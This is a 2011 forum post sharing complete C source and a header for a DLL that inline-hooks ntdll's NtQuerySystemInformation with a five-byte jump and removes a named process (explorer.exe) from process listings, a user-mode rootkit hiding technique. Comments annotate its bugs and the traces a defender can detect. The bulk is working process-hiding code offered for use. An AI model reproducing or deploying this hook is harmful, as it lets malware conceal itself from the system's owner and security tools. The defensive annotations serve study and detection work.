[c] Process Hiding - Amin_Mansouri - 10-16-2011
مخفی کردن برنامه در پروسه با زبان سی
[c] Process Hiding
Author: stdio
I didn't really see a good C example, so I decided to share my DLL that hooks NtQuerySystemInformation and hides explorer.exe
#include <Windows.h>
#include "sysinfo.h"
/* Saved copy of the first 5 bytes of ntdll!NtQuerySystemInformation. Filled by
 * PlaceHook before the export is patched and written back by UnHook; 5 bytes is
 * the size of the E9 rel32 jump that PlaceHook installs. Global, uninitialised
 * until PlaceHook runs. */
BYTE OrigBytes[5];
/* Image name that HookedNtQuerySystemInformation removes from
 * SystemProcessInformation results. Compared with lstrcmpW, i.e. an exact,
 * case-sensitive match against ProcessName.Buffer of each record. */
WCHAR g_TargetProc[] = L"explorer.exe";
/*
 * Trampoline into the real ntdll!NtQuerySystemInformation, called by
 * HookedNtQuerySystemInformation once PlaceHook has written the E9 detour.
 * The body is a byte template that PlaceHook patches at run time, not code
 * that is meant to execute as written:
 *   bytes 0..4    mov eax, 0dfh   - placeholder that only reserves 5 bytes;
 *                                   PlaceHook overwrites them with OrigBytes
 *   bytes 5..9    mov ecx, imm32  - the imm32 at offset 6 is overwritten with
 *                                   sourceFunction + 5 (see PlaceHook)
 *   bytes 10..11  jmp ecx         - resumes ntdll just past the detoured bytes
 * __declspec(naked) and __asm are MSVC x86-only extensions: no prologue or
 * epilogue is emitted and the stub cannot be built for x64. ntdll's own ret
 * brings control back to the call site inside HookedNtQuerySystemInformation.
 * Relies on the export's first 5 bytes forming whole instructions (the
 * placeholder mirrors the 32-bit "mov eax, imm32" service stub) - if the
 * targeted build starts differently, the copied bytes are a split instruction.
 * TODO confirm for each OS build the DLL is used on.
 */
__declspec(naked) NTSTATUS NTAPI OriginalNtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
__asm
{
mov eax, 0dfh //5 Bytes overwritten with original read 5 (placeholder, replaced by PlaceHook)
mov ecx, 0xcafebabe // imm32 placeholder at offset 6, replaced with sourceFunction + 5
jmp ecx
}
}
/*
 * Replacement for ntdll!NtQuerySystemInformation; control arrives here via the
 * E9 detour that PlaceHook writes over the export. Same signature as the
 * original so every caller in the process is affected.
 *
 * Behaviour: always forwards to the real function through the trampoline,
 * then, for SystemProcessInformation only, walks the NextEntryDelta-chained
 * records in the caller's buffer and unlinks every record whose ProcessName
 * equals g_TargetProc by adding its delta to the predecessor's delta. Other
 * information classes are returned untouched.
 *
 * Points a reviewer/defender should note (all visible in the code below):
 *  - Result is not tested with NT_SUCCESS before the walk, so the list is
 *    parsed even when the call failed; the buffer is then not guaranteed to
 *    hold a valid list.
 *  - Unlinking only changes the delta chain. The hidden record's bytes stay in
 *    the buffer and neither ReturnLength nor Result is adjusted, so the raw
 *    buffer still contains the entry and a second enumeration path (another
 *    process, or a kernel-side view) will disagree with this process's view.
 *  - ProcessName.Buffer is passed to lstrcmpW without a NULL check and is
 *    assumed to be NUL-terminated, which a UNICODE_STRING does not guarantee.
 *  - The unlinking is done on the caller's buffer in place; nothing is
 *    allocated.
 */
NTSTATUS NTAPI HookedNtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS Result;
PSYSTEM_PROCESSES pSystemProcess;      /* last record kept (predecessor) */
PSYSTEM_PROCESSES pNextSystemProcess;  /* record currently being examined */
/* Let the real call fill the buffer first; the hook only edits its output. */
Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
switch(SystemInformationClass)
{
case SystemProcessInformation:
pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
/* NextEntryDelta is a byte offset to the following record. */
pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
/* A delta of 0 marks the end of the list. */
while(pNextSystemProcess->NextEntryDelta != 0)
{
if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
/* Skip over the matching record: the predecessor now points past it. */
pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
}
pSystemProcess = pNextSystemProcess;
pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
}
break;
}
return Result;
}
/*
 * Installs a 5-byte inline detour on ntdll!NtQuerySystemInformation in the
 * current process so that calls land in HookedNtQuerySystemInformation.
 *
 * Returns 0 on success, 1 when the export could not be resolved. Note that
 * OrigBytes is read from sourceFunction one line before that NULL test.
 * The return values of the VirtualProtect calls are not checked.
 *
 * Steps:
 *  1. Resolve the export and save its first 5 bytes into OrigBytes.
 *  2. Patch the trampoline (OriginalNtQuerySystemInformation): put the saved
 *     bytes at offset 0 and the resume address (sourceFunction + 5) at
 *     offset 6, the imm32 slot of its "mov ecx" instruction.
 *  3. Overwrite the export's first 5 bytes with E9 <rel32> jumping to
 *     HookedNtQuerySystemInformation.
 *
 * Artifacts a defender can look for: the export's first byte becomes 0xE9,
 * so ntdll's in-memory .text no longer matches the on-disk image and the
 * exported stub no longer starts with its normal prologue; and both a ntdll
 * code page and this module's own code page are temporarily switched to
 * PAGE_EXECUTE_READWRITE, which memory-protection auditing can observe.
 *
 * The rel32 displacement is a 32-bit value computed from raw pointer
 * arithmetic, and the trampoline is x86 inline asm: the whole routine
 * assumes a 32-bit process.
 */
DWORD PlaceHook()
{
DWORD oldProtect;
LPVOID sourceFunction;   /* ntdll!NtQuerySystemInformation (the hooked export) */
LPVOID destFunction;     /* where the detour jumps to */
LPVOID stubFunction;     /* trampoline template to be patched */
destFunction = HookedNtQuerySystemInformation;
stubFunction = OriginalNtQuerySystemInformation;
sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
/* Save the bytes the E9 jump will overwrite; UnHook writes them back. */
CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);
if(sourceFunction == NULL){
return 1;
}
// PatchStub: make the trampoline writable, drop in the saved prologue bytes
// and the resume address (imm32 of "mov ecx" sits at offset 6).
VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
*(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);
//PatchSource: E9 = JMP rel32; displacement is relative to the end of the
//5-byte instruction (sourceFunction + 5).
VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
*(LPBYTE)sourceFunction = 0xE9;
*(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);
return 0;
}
/*
 * Restores the 5 original bytes saved in OrigBytes over the export, undoing
 * PlaceHook. Once this has run ntdll's code is byte-identical again, so an
 * integrity comparison against the on-disk image only catches the hook while
 * the DLL is loaded; DLL load/unload events are the lasting trace.
 *
 * No check that PlaceHook succeeded: if the export lookup failed there, it
 * fails here too, addr is NULL and CopyMemory writes through it. VirtualProtect
 * return values are not checked.
 */
void UnHook()
{
DWORD oldProtect;
LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
/* Put the saved prologue back; the trampoline is left as patched. */
CopyMemory(addr,OrigBytes,sizeof(BYTE)*5);
VirtualProtect(addr, 5, oldProtect, &oldProtect);
}
/*
 * DLL entry point. The hook is installed on DLL_PROCESS_ATTACH and removed on
 * DLL_PROCESS_DETACH; thread attach/detach notifications are ignored and the
 * function always returns TRUE, so a failed PlaceHook (return value discarded)
 * does not stop the DLL from loading.
 *
 * Because nothing else triggers the hook, the DLL being mapped into a process
 * is the single event a defender needs to see: image-load telemetry and a
 * review of unexpected modules in processes that enumerate the process list.
 * UnHook runs on detach regardless of lpvReserved, i.e. also during process
 * termination. hinstDLL is declared HANDLE rather than HINSTANCE; harmless, as
 * it is unused.
 */
BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
switch (dwReason){
case DLL_PROCESS_ATTACH:
PlaceHook();  /* return code (0 ok / 1 export not found) is ignored */
break;
case DLL_PROCESS_DETACH:
UnHook();
break;
}
return TRUE;
}
and the header:
#ifndef __SYSINFO_H__
#define __SYSINFO_H__  /* NOTE: names starting with "__" are reserved for the implementation; SYSINFO_H would do */
/* Fallback definition. #ifndef only sees a macro named NTSTATUS: if another
 * header typedefs NTSTATUS instead, this still defines it as a macro for LONG. */
#ifndef NTSTATUS
#define NTSTATUS LONG
#endif
/* NT convention: a non-negative status is success, negative is an error. */
#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_SUCCESS 0x00000000
/*
 * Information classes for NtQuerySystemInformation. The enumerators carry no
 * explicit values, so each one's number is its position: SystemProcessInformation
 * is 5, the value HookedNtQuerySystemInformation switches on, and the same
 * value the public winternl.h documents. Only that entry is used by this code.
 * The remaining names appear to come from an unofficial list (several differ
 * from current SDK spellings, e.g. SystemPowerInformation1) - verify against
 * winternl.h before relying on any other member.
 */
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation, /* = 5; the only class the hook handles */
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemNextEventIdInformation,
SystemEventIdsInformation,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeperation,
SystemPlugPlayBusInformation,
SystemDockInformation,
SystemPowerInformation1,
SystemProcessorSpeedInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
/*
 * Counted wide string with the UNICODE_STRING layout (Length and MaximumLength
 * are byte counts). The SDK does not guarantee that Buffer is NUL-terminated,
 * yet the hook hands ProcessName.Buffer to lstrcmpW, which requires a
 * terminator. Declared under both the LSA_ and plain names so either spelling
 * can be used.
 */
typedef struct _LSA_UNICODE_STRING {
USHORT Length;         /* bytes in use, not characters */
USHORT MaximumLength;  /* bytes allocated for Buffer */
PWSTR Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
/* CONST applied to a pointer typedef qualifies the pointer itself, not the
 * pointee: this is "UNICODE_STRING * const", unlike the SDK's
 * "const UNICODE_STRING *". */
typedef CONST PUNICODE_STRING PCUNICODE_STRING;
typedef LONG KPRIORITY;  /* scheduling priority as exposed by the NT process/thread records */
/* Per-process memory counters embedded in SYSTEM_PROCESSES. All size fields are
 * SIZE_T, so this part of the record follows the pointer size of the build. */
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;
/* Process/thread id pair. The SDK declares both members as HANDLE
 * (pointer-sized); the DWORDs here match that layout only in a 32-bit
 * process, consistent with the x86-only hook code. */
typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;
/* One thread record; an array of these trails each SYSTEM_PROCESSES record.
 * Not read by the hook; listed so the process record's size is complete. */
typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;
/*
 * One process record in a SystemProcessInformation buffer (the structure the
 * SDK calls SYSTEM_PROCESS_INFORMATION). Records are chained by
 * NextEntryDelta, the byte offset from this record to the next; 0 marks the
 * last record. HookedNtQuerySystemInformation walks that chain and reads
 * ProcessName; every other field is only here to keep the offsets right.
 * ProcessId and InheritedFromProcessId are ULONG where the SDK uses HANDLE, so
 * like CLIENT_ID this layout is the 32-bit one. Threads[1] is the pre-C99
 * "array of one" idiom for a variable-length tail of ThreadCount entries.
 */
typedef struct _SYSTEM_PROCESSES {
ULONG NextEntryDelta;  /* byte offset to the next record; 0 = end of list */
ULONG ThreadCount;     /* number of entries in Threads[] */
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;  /* image name the hook compares against g_TargetProc */
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
SYSTEM_THREADS Threads[1];  /* actually ThreadCount entries */
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
/* Function-pointer type matching NtQuerySystemInformation's signature. Unused
 * by the DLL above, which reaches the original through the naked trampoline
 * instead. NOTE: a name containing "__" is reserved for the implementation. */
typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
#endif